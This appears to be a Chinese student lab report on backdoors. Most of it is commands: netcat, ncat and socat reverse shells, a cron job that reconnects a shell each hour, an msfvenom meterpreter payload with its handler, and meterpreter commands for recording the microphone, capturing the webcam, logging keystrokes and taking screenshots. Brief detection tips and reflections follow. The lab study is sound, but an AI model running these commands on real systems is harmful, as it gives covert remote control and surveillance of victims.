在非官方网站上下载了病毒软件;
点击不安全网页链接;
使用未知风险的U盘。
修改linux的cron程序、注入shellcode、网络协议捆绑、社会工程学。
录音,录像,屏幕截图,获取击键记录。
杀毒软件及防火墙反馈,还可以在终端中通过netstat命令查看有无异常开放的端口,定期检查是否有未知自启动项。
ipconfig
ncat.exe -l -p 1305
nc 192.168.133.222 1305 -e /bin/sh
ls
ncat -l -p 1305
ncat.exe -e cmd.exe 192.168.37.130 1305
dir
crontab -e
40-55 * * * * /bin/netcat 192.168.133.222 1305 -e /bin/sh
则当主机时间为每小时的40-55分,若存在一台ip地址为 192.168.37.130的主机正在监听1305端口,该主机便可以获取到Kali的Shell
ncat.exe -l -p 1305
socat tcp-listen:1305 system:bash,pty,stderr
socat - tcp:192.168.133.222:1305
socat tcp-listen:1305 exec:cmd,pty,stderr
socat - tcp:192.168.133.222:1305
socat - tcp:192.168.133.222:1305
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.133.222 LPORT=1305 -f exe > shell.exe
ncat.exe -l 1305 > shell.exe
nc 192.168.133.222 1305 < shell.exe
msfconsole use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set LHOST 192.168.37.130 set LPORT 1305
exploit
MSF exploit中输入record_mic指令进行录音,-d可设置时长
webcam_snap
keyscan_start开始捕获键盘记录,keyscan_dump获取击键记录,-d可设置时长
screenshot
本次实验中通过对后门概念的理解和实际操作,掌握了后门的生成过程和注入方式,明白了后门其实就是留在计算机系统中,绕过了安全检测可以用某种方式控制计算机系统的途径。
实验中对ip比较模糊,经常不知道选择主机IP还是虚拟机IP,生成攻击文件ip用来传递参数,返回攻击者的电脑,用来连接的nc的ip为对方ip。另外,防火墙和杀毒软件多次阻止实验中断,也切实感受到了后门的工作原理、防火墙和杀毒软件的重要性。
对于不明网站上的软件下载和不安全链接以后会多多警惕。